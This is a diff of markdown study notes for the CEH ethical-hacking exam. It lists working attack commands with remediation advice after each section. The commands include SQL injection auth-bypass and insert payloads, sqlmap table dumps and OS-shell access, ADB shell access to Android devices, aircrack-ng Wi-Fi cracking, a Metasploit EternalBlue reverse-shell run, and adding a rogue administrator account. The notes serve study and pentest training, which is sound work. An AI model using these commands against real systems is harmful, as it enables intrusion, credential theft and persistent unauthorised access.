Bhart-Verma/CEH-Notes/ceh-notes.md

 Remediation:

-Sanitize all inputs.
+Sanitize all user inputs with libraries like DOMPurify.
-Use Content Security Policy (CSP).
+Implement Content Security Policy (CSP) to block unauthorized scripts.
-Escape outputs (HTML, JSON, JS).
+Escape outputs in HTML, JSON, and JavaScript.
-Update WordPress and plugins.
+Keep WordPress and plugins updated.
-Restrict directory access.
-Disable command execution.
+Restrict access to sensitive directories (e.g., /admin).
+Prevent command execution in input fields.

 SQL Injections

 Note: This section collapses to hide SQL injection steps.
 Expand to see SQLMap.

-SQLMap Commands
+SQLMap
-1- Auth Bypass-:
+1- Auth bypass (from dhabaleshwar):
-# Bypass login
+# Bypass login by making the query always true
-hi' OR 1=1 --
+' OR 1=1 --

-2- Insert new details if sql injection found in login page in username tab enter-:
+Steps: Enter in a login form’s username field (e.g., admin' OR 1=1 --) to bypass authentication.

+2- Insert new user (from infovault-Ytube):
-# Add new user
+# Add a new user to the database via login form
-blah';insert into login values('john','apple123');--

-3- Exploit a Blind SQL Injection- In the website profile, do inspect element and in the console tab write:
+'; INSERT INTO users (username, password) VALUES ('john', 'apple123'); --

+Steps: Inject in the username field of a vulnerable login form.

+3- Blind SQL injection (from infovault-Ytube):
-# Get cookies
+# Get session cookies from the browser’s developer console
 document.cookie

-Then copy the cookie value that was presented after this command.
-Then go to terminal and type this command:

-# Find databases
+# Find all databases on a vulnerable web app
-sqlmap -u "http://<domain>/profile.aspx?id=1" --cookie="<cookie_value>" --dbs
+sqlmap -u "http://example.com/profile?id=1" --cookie="session=abc123" --dbs

-4- Command to check tables of database retrieved-:
+4- List tables:
-# List tables
+# List tables in a specific database (e.g., 'webapp_db')
-sqlmap -u "http://<domain>/profile.aspx?id=1" --cookie="<cookie_value>" -D <database> --tables
+sqlmap -u "http://example.com/profile?id=1" --cookie="session=abc123" -D webapp_db --tables

-5- Select the table you want to dump- (Get username and password):
+5- Dump data:
-# Dump table data
+# Dump data (e.g., usernames, passwords) from a table (e.g., 'users')
-sqlmap -u "http://<domain>/profile.aspx?id=1" --cookie="<cookie_value>" -D <database> -T <table> --dump
+sqlmap -u "http://example.com/profile?id=1" --cookie="session=abc123" -D webapp_db -T users --dump

-6- For OS shell this is the command-:
+6- Get OS shell (from dhabaleshwar):
-# Get shell
+# Gain a command shell on the server
-sqlmap -u "http://<domain>/profile.aspx?id=1" --cookie="<cookie_value>" --os-shell
+sqlmap -u "http://example.com/profile?id=1" --cookie="session=abc123" --os-shell

-In the shell type:
+In shell:

-# to view the tasks
+# List running processes (Windows)
 TASKLIST
-# for windows to get all os version
+# Get Windows OS version
 systeminfo
-# for linux to get os version
+# Get Linux OS version
 uname -a

 Remediation:

-Use parameterized queries.
+Use parameterized queries in all database operations.
-Escape inputs.
+Escape user inputs properly.
-Limit database user permissions.
+Limit database user permissions to minimum needed.
-Use a WAF.
+Deploy a Web Application Firewall (WAF).

-Android
+Android Hacking

 Note: This section collapses to hide Android hacking steps.
-Expand to see Nmap and ADB.
+Expand to see Nmap, ADB.

-Android Tools
 Nmap and ADB
-1- Scan for ADB port-:
+1- Scan for ADB port (from DarkLycn1976):
-# Check port 5555
+# Check if Android Debug Bridge port 5555 is open
-nmap -sV -p 5555 <ip>
+nmap -sV -p 5555 192.168.1.100

-2- Connect to ADB- (Connect adb with parrot):
+2- Connect to ADB (from infovault-Ytube):
-# Connect to device
+# Connect to an Android device over the network
-adb connect <ip>:5555
+adb connect 192.168.1.100:5555

-3- Access mobile device on parrot-:
+3- Access device (from infovault-Ytube):
-# Access mobile device on parrot
+# Access the Android device’s shell
 adb shell
-# check current directory
+# Show current directory
 pwd
-# list files
+# List files in current directory
 ls
-# go to sdcard
+# Navigate to the sdcard directory
 cd sdcard
 ls
-# read file
+# Read a file (e.g., a secret note)
 cat secret.txt
-# If you can't find it there then go to Downloads folder
+# If not found, check the Downloads folder
 cd downloads
 ls

 Remediation:

-Disable ADB and USB debugging.
+Disable ADB and USB debugging on Android devices.
-Restrict network access to port 5555.
+Block network access to port 5555 with a firewall.

-Wireshark

-Note: This section collapses to hide Wireshark steps.
-Expand to see filters.

-Wireshark Filters
-1- Filters for analysis-:
-# How many machines
-tcp.flags.syn == 1 and tcp.flags.ack == 0
-# Which machine for dos
-tcp.flags.syn == 1
-# for passwords
-http.request.method == POST

-Alternative: click Tools > Credentials for passwords.
-For machine count: Go to Statistics > IPv4 Addresses > Source and Destination, then apply filter.

-Remediation:

-Enforce HTTPS.
-Use IDS for DoS detection.
-Encrypt credentials.

-Find FQDN

-Note: This section collapses to hide FQDN steps.
-Expand to see Nmap.

-Nmap for FQDN
-1- Nmap for LDAP (port 389)- (Find the FQDN in a subnet/network):
-# Scan subnet for LDAP
-nmap -p389 -sV -iL <target_list>
-# or single IP
-nmap -p389 -sV <ip>

-Remediation:

-Restrict LDAP port 389.
-Use secure LDAP authentication.

-Cracking Wi-Fi Networks
+Wi-Fi Cracking

 Note: This section collapses to hide Wi-Fi cracking steps.
 Expand to see Aircrack-ng.

-Aircrack-ng Commands
+Aircrack-ng
-1- Cracking Wifi Password-:
+1- Crack Wi-Fi passwords (from DarkLycn1976):
-# For cracking WEP network
+# Crack a WEP network using a captured pcap file
-aircrack-ng <pcap_file>
+aircrack-ng capture_wep.pcap
-# For cracking WPA2 or other networks through the captured .pcap file
+# Crack a WPA2 network with a wordlist and captured handshake
-aircrack-ng -a2 -b <target_bssid> -w /home/attacker/Desktop/Wordlist/password.txt <wpa2_pcap_file>
+aircrack-ng -a2 -b 00:14:22:33:44:55 -w /home/user/wordlists/passwords.txt capture_wpa2.pcap

 Remediation:

-Use WPA3 or strong WPA2 passwords.
+Use WPA3 or strong WPA2 passwords (e.g., 20+ characters).
-Enable MAC filtering.
+Enable MAC address filtering on the router.
-Disable WEP.
+Disable WEP, as it’s insecure.

+Privilege Escalation

+Note: This section collapses to hide privilege escalation steps.
+Expand to see Metasploit, manual commands.

+Metasploit
+1- Exploit vulnerabilities (from DarkLycn1976):
+# Launch Metasploit console
+msfconsole
+# Search for exploits (e.g., for SMB)
+search smb
+# Use an exploit (e.g., EternalBlue)
+use exploit/windows/smb/ms17_010_eternalblue
+set RHOSTS 192.168.1.10
+set PAYLOAD windows/meterpreter/reverse_tcp
+run

+Manual Commands
+2- Windows privilege escalation (from dhabaleshwar):
+# Check current user’s privileges
+whoami
+# List all user accounts
+net user
+# Add a new user
+net user hacker password123 /add
+# Add the user to the Administrators group
+net localgroup Administrators hacker /add

+Remediation:

+Apply security patches regularly.
+Use least privilege accounts for daily operations.
+Monitor for unauthorized user accounts or privilege changes.

-Some Extra Work
+Extra Checks

 Note: This section collapses to hide extra checks.
 Expand to see Nmap.

-Nmap Checks
+Nmap
-1- Check RDP enabled after getting ip-:
+1- Check RDP (from DarkLycn1976):
-# ip.txt contains all the alive hosts from target subnet
+# Scan a list of IPs for open RDP port 3389
-nmap -p 3389 -iL ip.txt | grep open
+nmap -p 3389 -iL /home/user/ip_list.txt | grep open

-2- Check MySQL service running-:
+2- Check MySQL (from dhabaleshwar):
-# ip.txt contains all the alive hosts from target subnet
+# Scan a list of IPs for open MySQL port 3306
-nmap -p 3306 -iL ip.txt | grep open
+nmap -p 3306 -iL /home/user/ip_list.txt | grep open

 Remediation:

-Disable RDP and MySQL if unused.
+Disable RDP and MySQL services if not needed.
-Restrict access to ports 3389, 3306.
+Restrict access to ports 3389 (RDP) and 3306 (MySQL) with firewalls.
-Use strong credentials.
+Use strong credentials for MySQL accounts.

 Remediation Summary

-Network: Block unused ports, use firewalls, monitor with IDS.
+Network: Block unused ports, configure firewalls, use IDS for monitoring.
-Web Apps: Sanitize inputs, use CSP, escape outputs, update software.
+Web Apps: Sanitize inputs, implement CSP, escape outputs, update software.
-Database: Parameterized queries, limit permissions.
+Database: Use parameterized queries, limit permissions.
-Wi-Fi: Strong passwords, WPA3, MAC filtering.
+Wi-Fi: Enforce strong passwords, use WPA3, enable MAC filtering.
-General: Patch systems, use complex passwords, regular pentests.
+General: Patch systems, use complex passwords, perform regular pentests.

 Last updated: April 2025